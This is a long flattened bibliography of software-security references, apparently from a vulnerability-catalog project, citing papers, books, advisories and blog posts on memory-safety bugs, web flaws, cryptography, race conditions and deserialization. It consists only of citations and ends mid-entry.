http://software-security.sans.org/blog/2010/03/19/top-25-series-rank-18-incorrect-calculation-of-buffer-size - - - Steve Christey - Format String Vulnerabilities in Perl Programs - http://www.securityfocus.com/archive/1/418460/30/0/threaded - - - Hal Burch - Robert C. Seacord - Programming Language Format String Vulnerabilities - http://www.ddj.com/dept/security/197002914 - - - Tim Newsham - Format String Attacks - 2000 - --09 - ---09 - Guardent - http://www.thenewsh.com/~newsham/format-string-attacks.pdf - - - Michael Howard - When scrubbing secrets in memory doesn't work - BugTraq - 2002 - --11 - ---05 - http://cert.uni-stuttgart.de/archive/bugtraq/2002/11/msg00046.html - - - Michael Howard - Some Bad News and Some Good News - 2002 - --10 - ---21 - Microsoft - http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dncode/html/secure10102002.asp - - - Joseph Wagner - GNU GCC: Optimizer Removes Code Necessary for Security - Bugtraq - 2002 - --11 - ---16 - http://www.derkeiler.com/Mailing-Lists/securityfocus/bugtraq/2002-11/0257.html - - - Greg Hoglund - Gary McGraw - Exploiting Software: How to Break Code - 2004 - --02 - ---27 - Addison-Wesley - https://www.amazon.com/Exploiting-Software-How-Break-Code/dp/0201786958 - - - Steve Christey - Blacklist defenses as a breeding ground for vulnerability variants - 2006 - --02 - ---03 - http://seclists.org/fulldisclosure/2006/Feb/0040.html - - - Yves Younan - An overview of common programming security vulnerabilities and possible solutions - Student thesis section 5.4.3 - 2003 - --08 - http://fort-knox.org/thesis.pdf - - - blexim - Basic Integer Overflows - Phrack - Issue 60, Chapter 10 - http://www.phrack.org/issues.html?issue=60&id=10#article - - - Johannes Ullrich - Top 25 Series - Rank 17 - Integer Overflow Or Wraparound - 2010 - --03 - ---18 - SANS Software Security Institute - http://software-security.sans.org/blog/2010/03/18/top-25-series-rank-17-integer-overflow-or-wraparound - - - Halvar Flake - Third Generation Exploits - presentation at Black Hat Europe 2001 - http://www.blackhat.com/presentations/bh-europe-01/halvar-flake/bh-europe-01-halvarflake.ppt - - - Steve Christey - Off-by-one errors: a brief explanation - Secprog and SC-L mailing list posts - 2004 - --05 - ---05 - http://marc.info/?l=secprog&m=108379742110553&w=2 - - - klog - The Frame Pointer Overwrite - Phrack Issue 55, Chapter 8 - 1999 - --09 - ---09 - http://kaizo.org/mirrors/phrack/phrack55/P55-08 - - - John McDonald - Mark Dowd - Justin Schuh - C Language Issues for Application Security - 2008 - --01 - ---25 - http://www.informit.com/articles/article.aspx?p=686170&seqNum=6 - - - Robert Seacord - Integral Security - 2006 - --11 - ---03 - http://www.ddj.com/security/193501774 - - - Jim Manico - Input Validation with ESAPI - Very Important - 2008 - --08 - ---15 - http://manicode.blogspot.com/2008/08/input-validation-with-esapi.html - - - Joel Scambray - Mike Shema - Caleb Sima - Hacking Exposed Web Applications, Second Edition - 2006 - --06 - ---05 - McGraw-Hill - - - Kevin Beaver - The importance of input validation - 2006 - --09 - ---06 - http://searchsoftwarequality.techtarget.com/tip/0,289483,sid92_gci1214373,00.html - - - Chris Wysopal - Mobile App Top 10 List - 2010 - --12 - ---13 - http://www.veracode.com/blog/2010/12/mobile-app-top-10-list/ - - - Web Application Security Consortium - Information Leakage - http://www.webappsec.org/projects/threat/classes/information_leakage.shtml - - - Brian Chess - Jacob West - Secure Programming with Static Analysis - 2007 - Addison-Wesley - - - Michael Howard - David LeBlanc - Writing Secure Code - 1st Edition - 2001 - --11 - ---13 - Microsoft Press - - - Johannes Ullrich - Top 25 Series - Rank 16 - Information Exposure Through an Error Message - 2010 - --03 - ---17 - SANS Software Security Institute - http://software-security.sans.org/blog/2010/03/17/top-25-series-rank-16-information-exposure-through-an-error-message - - - OWASP - Testing for Path Traversal (OWASP-AZ-001) - http://www.owasp.org/index.php/Testing_for_Path_Traversal_(OWASP-AZ-001) - - - Johannes Ullrich - Top 25 Series - Rank 7 - Path Traversal - 2010 - --03 - ---09 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/09/top-25-series-rank-7-path-traversal/ - - - OWASP - OWASP Attack listing - http://www.owasp.org/index.php/Relative_Path_Traversal - - - Herbert Schildt - Herb Schildt's C++ Programming Cookbook - 2008 - --04 - ---28 - McGraw-Hill Osborne Media - - - Jerome H. Saltzer - Michael D. Schroeder - The Protection of Information in Computer Systems - Proceedings of the IEEE 63 - 1975 - --09 - http://web.mit.edu/Saltzer/www/publications/protection/ - - - NIST - Federal Desktop Core Configuration - http://nvd.nist.gov/fdcc/index.cfm - - - John Viega - Gary McGraw - Building Secure Software: How to Avoid Security Problems the Right Way - 1st Edition - 2002 - Addison-Wesley - - - NIST - Role Based Access Control and Role Based Security - http://csrc.nist.gov/groups/SNS/rbac/ - - - Frank Kim - Top 25 Series - Rank 5 - Improper Access Control (Authorization) - 2010 - --03 - ---04 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/04/top-25-series-rank-5-improper-access-control-authorization/ - - - Rahul Bhattacharjee - Authentication using JAAS - http://www.javaranch.com/journal/2008/04/authentication-using-JAAS.html - - - Kim Zetter - Weak Password Brings 'Happiness' to Twitter Hacker - 2009 - --01 - ---09 - http://www.wired.com/threatlevel/2009/01/professed-twitt/ - - - OWASP - Top 10 2007-Broken Authentication and Session Management - 2007 - http://www.owasp.org/index.php/Top_10_2007-A7 - - - OWASP - Guide to Authentication - http://www.owasp.org/index.php/Guide_to_Authentication - - - Microsoft - Authentication - http://msdn.microsoft.com/en-us/library/aa374735(VS.85).aspx - - - Sascha Fahl, Marian Harbach, Thomas Muders, Matthew Smith - Lars Baumgärtner, Bernd Freisleben - Why Eve and Mallory Love Android: An Analysis of Android SSL (In)Security - 2012 - --10 - ---16 - http://www2.dcsec.uni-hannover.de/files/android/p50-fahl.pdf - - - M. Bishop - Computer Security: Art and Science - 2003 - Addison-Wesley - - - Martin Georgiev - Subodh Iyengar - Suman Jana - Rishita Anubhai - Dan Boneh - Vitaly Shmatikov - The Most Dangerous Code in the World: Validating SSL Certificates in Non-Browser Software - 2012 - --10 - ---25 - http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf - - - Kenneth Ballard - Secure programming with the OpenSSL API, Part 2: Secure handshake - 2005 - --05 - ---03 - http://www.ibm.com/developerworks/library/l-openssl2/index.html - - - Eric Rescorla - An Introduction to OpenSSL Programming (Part I) - 2001 - --10 - ---05 - http://www.rtfm.com/openssl-examples/part1.pdf - - - Frank Kim - Top 25 Series - Rank 19 - Missing Authentication for Critical Function - 2010 - --02 - ---23 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/02/23/top-25-series-rank-19-missing-authentication-for-critical-function/ - - - Frank Kim - Top 25 Series - Rank 10 - Missing Encryption of Sensitive Data - 2010 - --02 - ---26 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/02/26/top-25-series-rank-10-missing-encryption-of-sensitive-data/ - - - Information Technology Laboratory, National Institute of Standards and Technology - SECURITY REQUIREMENTS FOR CRYPTOGRAPHIC MODULES - 2001 - --05 - ---25 - http://csrc.nist.gov/publications/fips/fips140-2/fips1402.pdf - - - OWASP - Top 10 2007-Insecure Communications - 2007 - http://www.owasp.org/index.php/Top_10_2007-A9 - - - Bruce Schneier - Applied Cryptography - 1996 - John Wiley & Sons - http://www.schneier.com/book-applied.html - - - Alfred J. Menezes - Paul C. van Oorschot - Scott A. Vanstone - Handbook of Applied Cryptography - 1996 - --10 - http://www.cacr.math.uwaterloo.ca/hac/ - - - C Matthew Curtin - Avoiding bogus encryption products: Snake Oil FAQ - 1998 - --04 - ---10 - http://www.faqs.org/faqs/cryptography-faq/snake-oil/ - - - Paul F. Roberts - Microsoft Scraps Old Encryption in New Code - 2005 - --09 - ---15 - http://www.eweek.com/c/a/Security/Microsoft-Scraps-Old-Encryption-in-New-Code/ - - - Johannes Ullrich - Top 25 Series - Rank 24 - Use of a Broken or Risky Cryptographic Algorithm - 2010 - --03 - ---25 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/25/top-25-series-rank-24-use-of-a-broken-or-risky-cryptographic-algorithm/ - - - Alexander Sotirov et al. - MD5 considered harmful today - http://www.phreedom.org/research/rogue-ca/ - - - Johnny Shelley - bcrypt - http://bcrypt.sourceforge.net/ - - - Colin Percival - Tarsnap - The scrypt key derivation function and encryption utility - http://www.tarsnap.com/scrypt.html - - - B. Kaliski - RFC2898 - PKCS #5: Password-Based Cryptography Specification Version 2.0 - 2000 - http://tools.ietf.org/html/rfc2898 - - - Coda Hale - How To Safely Store A Password - 2010 - --01 - ---31 - http://codahale.com/how-to-safely-store-a-password/ - - - Brian Krebs - How Companies Can Beef Up Password Security (interview with Thomas H. Ptacek) - 2012 - --06 - ---11 - http://krebsonsecurity.com/2012/06/how-companies-can-beef-up-password-security/ - - - Solar Designer - Password security: past, present, future - 2012 - http://www.openwall.com/presentations/PHDays2012-Password-Security/ - - - Troy Hunt - Our password hashing has no clothes - 2012 - --06 - ---26 - http://www.troyhunt.com/2012/06/our-password-hashing-has-no-clothes.html - - - Joshbw - Should we really use bcrypt/scrypt? - 2012 - --06 - ---08 - http://www.analyticalengine.net/2012/06/should-we-really-use-bcryptscrypt/ - - - Michal Zalewski - Strange Attractors and TCP/IP Sequence Number Analysis - 2001 - http://www.bindview.com/Services/Razor/Papers/2001/tcpseq.cfm - - - Taimur Aslam - A Taxonomy of Security Faults in the UNIX Operating System - 1995 - --08 - ---01 - http://cwe.mitre.org/documents/sources/ATaxonomyofSecurityFaultsintheUNIXOperatingSystem%5BAslam95%5D.pdf - - - Peter W - Cross-Site Request Forgeries (Re: The Dangers of Allowing Users to Post Images) - Bugtraq - http://marc.info/?l=bugtraq&m=99263135911884&w=2 - - - OWASP - Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet - http://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet - - - Edward W. Felten - William Zeller - Cross-Site Request Forgeries: Exploitation and Prevention - 2008 - --10 - ---18 - http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.147.1445 - - - Robert Auger - CSRF - The Cross-Site Request Forgery (CSRF/XSRF) FAQ - http://www.cgisecurity.com/articles/csrf-faq.shtml - - - Cross-site request forgery - 2008 - --12 - ---22 - Wikipedia - http://en.wikipedia.org/wiki/Cross-site_request_forgery - - - Jason Lam - Top 25 Series - Rank 4 - Cross Site Request Forgery - 2010 - --03 - ---03 - SANS Software Security Institute - http://software-security.sans.org/blog/2010/03/03/top-25-series-rank-4-cross-site-request-forgery - - - Jeff Atwood - Preventing CSRF and XSRF Attacks - 2008 - --10 - ---14 - http://www.codinghorror.com/blog/2008/10/preventing-csrf-and-xsrf-attacks.html - - - J. Oates - AOL man pleads guilty to selling 92m email addies - The Register - 2005 - http://www.theregister.co.uk/2005/02/07/aol_email_theft/ - - - NIST - Guide to Protecting the Confidentiality of Personally Identifiable Information (SP 800-122) - 2010 - --04 - http://csrc.nist.gov/publications/nistpubs/800-122/sp800-122.pdf - - - U.S. Department of Commerce - Safe Harbor Privacy Framework - http://www.export.gov/safeharbor/ - - - Federal Trade Commission - Financial Privacy: The Gramm-Leach Bliley Act (GLBA) - http://www.ftc.gov/privacy/glbact/index.html - - - U.S. Department of Human Services - Health Insurance Portability and Accountability Act (HIPAA) - http://www.hhs.gov/ocr/hipaa/ - - - Government of the State of California - California SB-1386 - 2002 - http://info.sen.ca.gov/pub/01-02/bill/sen/sb_1351-1400/sb_1386_bill_20020926_chaptered.html - - - Andrei Alexandrescu - volatile - Multithreaded Programmer's Best Friend - Dr. Dobb's - 2008 - --02 - ---01 - http://www.ddj.com/cpp/184403766 - - - Steven Devijver - Thread-safe webapps using Spring - http://www.javalobby.org/articles/thread-safe/index.jsp - - - David Wheeler - Prevent race conditions - 2007 - --10 - ---04 - http://www.ibm.com/developerworks/library/l-sprace.html - - - Matt Bishop - Race Conditions, Files, and Security Flaws; or the Tortoise and the Hare Redux - 1995 - --09 - http://www.cs.ucdavis.edu/research/tech-reports/1995/CSE-95-9.pdf - - - David Wheeler - Secure Programming for Linux and Unix HOWTO - 2003 - --03 - ---03 - http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/avoid-race.html - - - Blake Watts - Discovering and Exploiting Named Pipe Security Flaws for Fun and Profit - 2002 - --04 - http://www.blakewatts.com/namedpipepaper.html - - - Roberto Paleari - Davide Marrone - Danilo Bruschi - Mattia Monga - On Race Vulnerabilities in Web Applications - http://security.dico.unimi.it/~roberto/pubs/dimva08-web.pdf - - - Avoiding Race Conditions and Insecure File Operations - Apple Developer Connection - http://developer.apple.com/documentation/Security/Conceptual/SecureCodingGuide/Articles/RaceConditions.html - - - Johannes Ullrich - Top 25 Series - Rank 25 - Race Conditions - 2010 - --03 - ---26 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/03/26/top-25-series-rank-25-race-conditions/ - - - Michal Zalewski - Delivering Signals for Fun and Profit - http://lcamtuf.coredump.cx/signals.txt - - - Race Condition: Signal Handling - http://www.fortify.com/vulncat/en/vulncat/cpp/race_condition_signal_handling.html - - - Dan Tsafrir - Tomer Hertz - David Wagner - Dilma Da Silva - Portably Solving File TOCTTOU Races with Hardness Amplification - 2008 - --02 - ---28 - http://www.usenix.org/events/fast08/tech/tsafrir.html - - - Alex Allain - Handling Errors Exceptionally Well in C++ - http://www.cprogramming.com/tutorial/exceptions.html - - - Microsoft - Exceptions and Exception Handling (C# Programming Guide) - https://msdn.microsoft.com/pl-pl/library/ms173160(v=vs.100).aspx - - - Tony Sintes - Does Java pass by reference or pass by value? - JavaWorld.com - 2000 - --05 - ---26 - http://www.javaworld.com/javaworld/javaqa/2000-05/03-qa-0526-pass.html - - - Herbert Schildt - Java: The Complete Reference, J2SE 5th Edition - - - Joao Antunes - Nuno Ferreira Neves - Paulo Verissimo - Detection and Prediction of Resource-Exhaustion Vulnerabilities - Proceedings of the IEEE International Symposium on Software Reliability Engineering (ISSRE) - 2008 - --11 - http://homepages.di.fc.ul.pt/~nuno/PAPERS/ISSRE08.pdf - - - D.J. Bernstein - Resource exhaustion - http://cr.yp.to/docs/resources.html - - - Pascal Meunier - Resource exhaustion - Secure Programming Educational Material - 2004 - http://homes.cerias.purdue.edu/~pmeunier/secprog/sanitized/class1/6.resource%20exhaustion.ppt - - - J. Whittaker - H. Thompson - How to Break Software Security - 2003 - Addison Wesley - - - iOS Developer Library - Transitioning to ARC Release Notes - 2013 - --08 - ---08 - https://developer.apple.com/library/ios/releasenotes/ObjectiveC/RN-TransitioningToARC/Introduction/Introduction.html - - - Paul Roberts - File descriptors and setuid applications - 2007 - --02 - ---05 - https://blogs.oracle.com/paulr/entry/file_descriptors_and_setuid_applications - - - Apple - Introduction to Secure Coding Guide - https://developer.apple.com/library/mac/#documentation/security/conceptual/SecureCodingGuide/Articles/AccessControl.html - - - Scott A. Crosby - Dan S. Wallach - Algorithmic Complexity Attacks - Proceedings of the 12th USENIX Security Symposium - 2003 - --08 - https://www.usenix.org/legacy/events/sec03/tech/full_papers/crosby/crosby.pdf - - - Paget - Exploiting design flaws in the Win32 API for privilege escalation. Or... Shatter Attacks - How to break Windows - 2002 - --08 - http://web.archive.org/web/20060115174629/http://security.tombom.co.uk/shatter.html - - - Georgi Guninski - Double clicking on MS Office documents from Windows Explorer may execute arbitrary programs in some cases - Bugtraq - 2000 - --09 - ---18 - - - Mitja Kolsek - ACROS Security: Remote Binary Planting in Apple iTunes for Windows (ASPR #2010-08-18-1) - Bugtraq - 2010 - --08 - ---18 - - - Taeho Kwon - Zhendong Su - Automatic Detection of Vulnerable Dynamic Component Loadings - http://www.cs.ucdavis.edu/research/tech-reports/2010/CSE-2010-2.pdf - - - Dynamic-Link Library Search Order - 2010 - --09 - ---02 - Microsoft - http://msdn.microsoft.com/en-us/library/ms682586%28v=VS.85%29.aspx - - - Dynamic-Link Library Security - 2010 - --09 - ---02 - Microsoft - http://msdn.microsoft.com/en-us/library/ff919712%28VS.85%29.aspx - - - An update on the DLL-preloading remote attack vector - 2010 - --08 - ---31 - Microsoft - http://blogs.technet.com/b/srd/archive/2010/08/23/an-update-on-the-dll-preloading-remote-attack-vector.aspx - - - Insecure Library Loading Could Allow Remote Code Execution - 2010 - --08 - ---23 - Microsoft - http://www.microsoft.com/technet/security/advisory/2269637.mspx - - - HD Moore - Application DLL Load Hijacking - 2010 - --08 - ---23 - http://blog.rapid7.com/?p=5325 - - - Oliver Lavery - DLL Hijacking: Facts and Fiction - 2010 - --08 - ---26 - http://threatpost.com/en_us/blogs/dll-hijacking-facts-and-fiction-082610 - - - Richard Stanway (r1CH) - Dynamic File Uploads, Security and You - http://shsc.info/FileUploadSecurity - - - Johannes Ullrich - 8 Basic Rules to Implement Secure File Uploads - 2009 - --12 - ---28 - http://blogs.sans.org/appsecstreetfighter/2009/12/28/8-basic-rules-to-implement-secure-file-uploads/ - - - Johannes Ullrich - Top 25 Series - Rank 8 - Unrestricted Upload of Dangerous File Type - 2010 - --02 - ---25 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/02/25/top-25-series-rank-8-unrestricted-upload-of-dangerous-file-type/ - - - Steve Christey - On Interpretation Conflict Vulnerabilities - Bugtraq - 2005 - --11 - ---03 - http://seclists.org/bugtraq/2005/Nov/30 - - - Thomas H. Ptacek - Timothy N. Newsham - Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection - 1998 - --01 - http://www.insecure.org/stf/secnet_ids/secnet_ids.pdf - - - Brett Moore - 0x00 vs ASP file upload scripts - 2004 - --07 - ---13 - http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf - - - Rain Forest Puppy - Poison NULL byte - Phrack - - - David F. Skoll - Re: Corsaire Security Advisory - Multiple vendor MIME RFC2047 encoding - Bugtraq - 2004 - --09 - ---15 - http://marc.info/?l=bugtraq&m=109525864717484&w=2 - - - Norm Hardy - The Confused Deputy (or why capabilities might have been invented) - 1988 - http://www.cap-lore.com/CapTheory/ConfusedDeputy.html - - - Chaim Linhart - Amit Klein - Ronen Heled - Steve Orrin - HTTP Request Smuggling - http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf - - - David Wheeler - Secure Programming for Linux and Unix HOWTO - 2003 - --03 - ---03 - http://www.dwheeler.com/secure-programs/Secure-Programs-HOWTO/semantic-attacks.html - - - mercy - Exploiting Uninitialized Data - 2006 - --01 - http://www.felinemenace.org/~mercy/papers/UBehavior/UBehavior.zip - - - Microsoft Security Vulnerability Research & Defense - MS08-014 : The Case of the Uninitialized Stack Variable Vulnerability - 2008 - --03 - ---11 - http://blogs.technet.com/swi/archive/2008/03/11/the-case-of-the-uninitialized-stack-variable-vulnerability.aspx - - - Robert Seacord - EXP01-A. Do not take the sizeof a pointer to determine the size of a type - https://www.securecoding.cert.org/confluence/display/seccode/EXP01-A.+Do+not+take+the+sizeof+a+pointer+to+determine+the+size+of+a+type - - - OWASP - OWASP , Attack Category : Mobile code: object hijack - http://www.owasp.org/index.php/Mobile_code:_object_hijack - - - Microsoft - Introduction to Code Signing - http://msdn.microsoft.com/en-us/library/ms537361(VS.85).aspx - - - Microsoft - Authenticode - http://msdn.microsoft.com/en-us/library/ms537359(v=VS.85).aspx - - - Apple - Code Signing Guide - Apple Developer Connection - 2008 - --11 - ---19 - http://developer.apple.com/documentation/Security/Conceptual/CodeSigningGuide/Introduction/chapter_1_section_1.html - - - Anthony Bellissimo - John Burgess - Kevin Fu - Secure Software Updates: Disappointments and New Challenges - http://prisms.cs.umass.edu/~kevinfu/papers/secureupdates-hotsec06.pdf - - - Johannes Ullrich - Top 25 Series - Rank 20 - Download of Code Without Integrity Check - 2010 - --04 - ---05 - SANS Software Security Institute - http://blogs.sans.org/appsecstreetfighter/2010/04/05/top-25-series-rank-20-download-code-integrity-check/ - - - Matthias Kaiser - Exploiting Deserialization Vulnerabilities in Java - 2015 - --10 - ---28 - http://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478 - - - Sam Thomas - PHP unserialization vulnerabilities: What are we missing? - 2015 - --08 - ---27 - http://www.slideshare.net/_s_n_t/php-unserialization-vulnerabilities-what-are-we-missing - - - Gabriel Lawrence - Chris Frohoff - Marshalling Pickles: How deserializing objects can ruin your day - 2015 - --01 - ---28 - http://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles - - - Heine Deelstra - Unserializing user-supplied data, a bad idea - 2010 - --08 - ---25 - http://heine.familiedeelstra.com/security/unserialize - - - Manish S. Saindane - Black Hat EU 2010 - Attacking Java Serialized Communication - 2010 - --04 - ---26 - http://www.slideshare.net/msaindane/black-hat-eu-2010-attacking-java-serialized-communication - - - Nadia Alramli - Why Python Pickle is Insecure - 2009 - --09 - ---09 - http://nadiana.com/python-pickle-insecure - - - Nelson Elhage - Exploiting misuse of Python's "pickle" - 2011 - --03 - ---20 - https://blog.nelhage.com/2011/03/exploiting-pickle/ - - - Chris Frohoff - Deserialize My Shorts: Or How I Learned to Start Worrying and Hate Java Object Deserialization - 2016 - --03 - ---21 - https://www.slideshare.net/frohoff1/deserialize-my-shorts-or-how-i-learned-to-start-worrying-and-hate-java-object-deserialization - - - Douglas C. Schmidt - Timothy H. Harrison - Nat Pryce - Thread-Specifc Storage for C/C++ - http://www.cs.wustl.edu/~schmidt/PDF/TSS-pattern.pdf - - - Intrinsic Locks and Synchronization (in Java) - http://java.sun.com/docs/books/tutorial/essential/concurrency/locksync.html - - - Valgrind - http://valgrind.org/ - - - Zvi Gutterman - Hold Your Sessions: An Attack on Java Session-id Generation - 2005 - --02 - ---13 - http://www.securiteam.com/securityreviews/5TP0F0UEVQ.html - - - Craig A. Shue - Andrew J. Kalafut - Minaxi Gupta - Exploitable Redirects on the Web: Identification, Prevalence, and Defense - http://www.cs.indiana.edu/cgi-pub/cshue/research/woot08.pdf - - - Russ McRee - Open redirect vulnerabilities: definition and prevention - Issue 17 - (IN)SECURE - 2008 - --07 - http://www.net-security.org/dl/insecure/INSECURE-Mag-17.pdf - - - Jason Lam - Top 25 Series - Rank 23 - Open Redirect - 2010 - --03 - ---25 - SANS Software Security Institute - http://software-security.sans.org/blog/2010/03/25/top-25-series-rank-23-open-redirect - - - David Bacon et al - The "Double-Checked Locking is Broken" Declaration - http://www.cs.umd.edu/~pugh/java/memoryModel/DoubleCheckedLocking.html - - - Jeremy Manson and Brian Goetz - JSR 133 (Java Memory Model) FAQ - http://www.cs.umd.edu/~pugh/java/memoryModel/jsr-133-faq.html#dcl - - - Steve Christey - Second-Order Symlink Vulnerabilities - Bugtraq - 2005 - --06 - ---07 - http://www.securityfocus.com/archive/1/401682 - - - Shaun Colley - Crafting Symlinks for Fun and Profit - Infosec Writers Text Library - 2004 - --04 - ---12 - http://www.infosecwriters.com/texts.php?op=display&id=159 - - - OWASP - XML External Entity (XXE) Processing - https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing - - - Sascha Herzog - XML External Entity Attacks (XXE) - 2010 - --10 - ---20 - https://www.owasp.org/images/5/5d/XML_Exteral_Entity_Attack.pdf - - - Gregory Steuck - XXE (Xml eXternal Entity) Attack - http://www.securiteam.com/securitynews/6D0100A5PU.html - - - WASC - XML External Entities (XXE) Attack - http://projects.webappsec.org/w/page/13247003/XML%20External%20Entities - - - Bryan Sullivan - XML Denial of Service Attacks and Defenses - 2009 - --09 - http://msdn.microsoft.com/en-us/magazine/ee335713.aspx - - - Chris Cornutt - Preventing XXE in PHP - http://websec.io/2012/08/27/Preventing-XXE-in-PHP.html - - - Shaun Clowes - A Study in Scarlet - section 5, "File Upload" - - - Microsoft - Developing Secure ActiveX Controls - 2005 - --04 - ---13 - https://msdn.microsoft.com/en-us/library/ms885903.aspx - - - David Litchfield - The Oracle Hacker's Handbook - - - David Litchfield - Cursor Injection - http://www.databasesecurity.com/dbsec/cursor-injection.pdf - - - Microsoft - How to stop an ActiveX control from running in Internet Explorer - https://support.microsoft.com/en-us/help/240797/how-to-stop-an-activex-control-from-running-in-internet-explorer - - - Rain Forest Puppy - Poison NULL byte - Phrack 55 - http://insecure.org/news/P55-07.txt - - - Brett Moore - 0x00 vs ASP file upload scripts - http://www.security-assessment.com/Whitepapers/0x00_vs_ASP_File_Uploads.pdf - - - ShAnKaR - ShAnKaR: multiple PHP application poison NULL byte vulnerability - http://seclists.org/fulldisclosure/2006/Sep/0185.html - - - Steve Christey - Dynamic Evaluation Vulnerabilities in PHP applications - Full-Disclosure - 2006 - --05 - ---03 - http://seclists.org/fulldisclosure/2006/May/0035.html - - - Shaun Clowes - A Study In Scarlet: Exploiting Common Vulnerabilities in PHP Applications - http://www.securereality.com.au/studyinscarlet.txt - - - Top 10 2007 - 2007 - --05 - ---18 - OWASP - http://www.owasp.org/index.php/Top_10_2007 - - - Sean Barnum - Michael Gegick - Failing Securely - 2005 - --12 - ---05 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/349.html - - - Sean Barnum - Michael Gegick - Economy of Mechanism - 2005 - --09 - ---13 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/348.html - - - Sean Barnum - Michael Gegick - Complete Mediation - 2005 - --09 - ---12 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/346.html - - - OWASP - Top 10 2007-Insecure Direct Object Reference - 2007 - http://www.owasp.org/index.php/Top_10_2007-A4 - - - HMAC - 2011 - --08 - ---18 - Wikipedia - http://en.wikipedia.org/wiki/Hmac - - - Web Application Security Consortium - XPath Injection - http://www.webappsec.org/projects/threat/classes/xpath_injection.shtml - - - Sean Barnum - Michael Gegick - Separation of Privilege - 2005 - --12 - ---06 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/357.html - - - Sean Barnum - Michael Gegick - Psychological Acceptability - 2005 - --09 - ---15 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/354.html - - - J. D. Tygar - Alma Whitten - Usability of Security: A Case Study - SCS Technical Report Collection, CMU-CS-98-155 - 1998 - --12 - ---15 - http://reports-archive.adm.cs.cmu.edu/anon/1998/CMU-CS-98-155.pdf - - - Jon Postel, Editor - RFC: 793, TRANSMISSION CONTROL PROTOCOL - 1981 - --09 - Information Sciences Institute - http://www.ietf.org/rfc/rfc0793.txt - - - Sean Barnum - Michael Gegick - Never Assuming that Your Secrets Are Safe - 2005 - --09 - ---14 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/352.html - - - Sean Barnum - Michael Gegick - Design Principles - 2005 - --09 - ---19 - https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/358.html - - - SUN - Java Concurrency API - http://java.sun.com/j2se/1.5.0/docs/api/java/util/concurrent/locks/ReentrantLock.html - - - Dipak Jha, Software Engineer, IBM - Use reentrant functions for safer signal handling - http://www.ibm.com/developerworks/linux/library/l-reent.html - - - Michael Howard - Security Development Lifecycle (SDL) Banned Function Calls - http://msdn.microsoft.com/en-us/library/bb288454.aspx - - - Don Parker - Windows NTFS Alternate Data Streams - 2005 - --02 - ---16 - http://www.securityfocus.com/infocus/1822 - - - Adam Doupé - Bryce Boe - Christopher Kruegel - Giovanni Vigna - Fear the EAR: Discovering and Mitigating Execution After Redirect Vulnerabilities - http://cs.ucsb.edu/~bboe/public/pubs/fear-the-ear-ccs2011.pdf - - - Taimur Aslam - A Taxonomy of Security Faults in the UNIX Operating System - 1995 - --08 - ---01 - http://ftp.cerias.purdue.edu/pub/papers/taimur-aslam/aslam-taxonomy-msthesis.pdf - - - Taimur Aslam - Ivan Krsul - Eugene H. Spafford - Use of A Taxonomy of Security Faults - 1995 - --08 - ---01 - http://csrc.nist.gov/nissc/1996/papers/NISSC96/paper057/PAPER.PDF - - - Top 10 2004 - 2004 - --01 - ---27 - OWASP - http://www.owasp.org/index.php/Top_10_2004 - - - PCI Security Standards Council - About the PCI Data Security Standard (PCI DSS) - https://www.pcisecuritystandards.org/security_standards/pci_dss.shtml - - - OWASP - Top 10 2007-Cross Site Scripting - 2007 - http://www.owasp.org/index.php/Top_10_2007-A1 - - - OWASP - Top 10 2007-Cross Site Request Forgery - 2007 - http://www.owasp.org/index.php/Top_10_2007-A5 - - - OWASP - Top 10 2007-Information Leakage and Improper Error Handling - 2007 - http://www.owasp.org/index.php/Top_10_2007-A6 - - - OWASP - Top 10 2007-Insecure Cryptographic Storage - 2007 - http://www.owasp.org/index.php/Top_10_2007-A8 - - - NetSec - NetSec Security Advisory: Multiple Vulnerabilities Resulting From Use Of Apple OSX HFS+ - BugTraq - 2005 - --02 - ---16 - http://seclists.org/bugtraq/2005/Feb/309 - - - OWASP - Top 10 2007-Failure to Restrict URL Access - 2007 - http://www.owasp.org/index.php/Top_10_2007-A10 - - - OWASP - A1 Unvalidated Input - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A2 Broken Access Control - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A3 Broken Authentication and Session Management - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A4 Cross-Site Scripting (XSS) Flaws - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A5 Buffer Overflows - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A6 Injection Flaws - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A7 Improper Error Handling - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A8 Insecure Storage - 2007 - http://sourceforge.net/project/showfiles.php?group_id=64424&package_id=70827 - - - OWASP - A9 Denial of Service - 2007 - 